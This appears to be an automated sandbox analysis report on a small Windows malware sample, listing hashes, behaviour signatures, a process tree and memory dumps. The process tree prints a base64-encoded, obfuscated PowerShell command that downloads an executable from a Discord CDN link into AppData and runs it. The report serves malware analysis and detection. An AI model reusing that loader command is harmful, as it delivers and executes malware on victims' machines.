2ce4cff45a5c16c1eafadc4f70a5fea9353b671231ac296e99de70cd13d2b629

General

Target

2ce4cff45a5c16c1eafadc4f70a5fea9353b671231ac296e99de70cd13d2b629.exe
Size

5KB
MD5

3ccc9ea7e01eada09c2345286fec084b
SHA1

f5ee560ceb8667d4af580e9c60b2793b34e80725
SHA256

2ce4cff45a5c16c1eafadc4f70a5fea9353b671231ac296e99de70cd13d2b629
SHA512

1e824b2f68e77449e796423fbddcbb1853b977fd099b232c636a143b8f2763e54c25392da0611773e99e94e7468a62abdc0dcac6c2dd86f9b6b114345f67d494
SSDEEP

96:rkd579YGL1bhycGdH8KYYdXNSOs7GAtTNtUqzpiON7Y3d3ojerl:MJ9YGL1bhycglNSOSlhNtUqzIO63dN

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
8	4380	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 1 IoCs

pid	Process
4588	10.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
4380	powershell.exe
4380	powershell.exe
4380	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4380	powershell.exe

Suspicious use of WriteProcessMemory 5 IoCs

description	pid	Process	procid_target
PID 5004 wrote to memory of 4380	5004	2ce4cff45a5c16c1eafadc4f70a5fea9353b671231ac296e99de70cd13d2b629.exe	66
PID 5004 wrote to memory of 4380	5004	2ce4cff45a5c16c1eafadc4f70a5fea9353b671231ac296e99de70cd13d2b629.exe	66
PID 4380 wrote to memory of 4588	4380	powershell.exe	68
PID 4380 wrote to memory of 4588	4380	powershell.exe	68
PID 4380 wrote to memory of 4588	4380	powershell.exe	68

C:\Users\Admin\AppData\Local\Temp\2ce4cff45a5c16c1eafadc4f70a5fea9353b671231ac296e99de70cd13d2b629.exe
"C:\Users\Admin\AppData\Local\Temp\2ce4cff45a5c16c1eafadc4f70a5fea9353b671231ac296e99de70cd13d2b629.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:5004
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAdQB2ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADQANQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA1ADUANgAwADQANgA1ADQANAA0ADYAMgAyADMAMwA3ADAALwAxADAANQA1ADYAMAA1ADAAOQA1ADUANQA2ADkAOAAwADgAMgA4AC8ATgBDAE4AWABKADIALgBlAHgAZQAnACwAIAA8ACMAYwB1AGEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBzAG0AZgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBsAG0AaQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAxADAALgBlAHgAZQAnACkAKQA8ACMAbAB6AGMAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAeQB1AGcAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHAAcQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADEAMAAuAGUAeABlACcAKQA8ACMAZwBsAGYAIwA+AA=="
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4380
- - C:\Users\Admin\AppData\Roaming\10.exe
    "C:\Users\Admin\AppData\Roaming\10.exe"
    3⤵
    - Executes dropped EXE
    PID:4588

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\10.exe

Filesize
4.0MB

MD5
1b95646f069d9414608be6d31fca0c1e

SHA1
1cc8efdcbb3f3bc290f99d73af1c065dcc3de4f9

SHA256
76fa10af6bec8b083f5f9339e16509ad0796e97776266317baa84c4129d6f4a4

SHA512
f899b1b7f135614bce8bfbe12fb663ecf761510c91ef7093b6f22374e2a533559ae2fd61555e632e7658bb39525837c613f41a83bb3d4326ea59b9e30e164def

Download Submit
C:\Users\Admin\AppData\Roaming\10.exe

Filesize
4.0MB

MD5
1b95646f069d9414608be6d31fca0c1e

SHA1
1cc8efdcbb3f3bc290f99d73af1c065dcc3de4f9

SHA256
76fa10af6bec8b083f5f9339e16509ad0796e97776266317baa84c4129d6f4a4

SHA512
f899b1b7f135614bce8bfbe12fb663ecf761510c91ef7093b6f22374e2a533559ae2fd61555e632e7658bb39525837c613f41a83bb3d4326ea59b9e30e164def

Download Submit
memory/4380-121-0x00000266F0E90000-0x00000266F0EB2000-memory.dmp

Filesize
136KB

Download
memory/4380-124-0x00000266F11C0000-0x00000266F1236000-memory.dmp

Filesize
472KB

Download
memory/4588-148-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/4588-152-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/4588-143-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/4588-144-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/4588-145-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/4588-146-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/4588-147-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/4588-161-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/4588-149-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/4588-151-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/4588-141-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/4588-153-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/4588-154-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/4588-155-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/4588-156-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/4588-157-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/4588-158-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/4588-159-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/4588-160-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/5004-115-0x0000000000210000-0x0000000000218000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing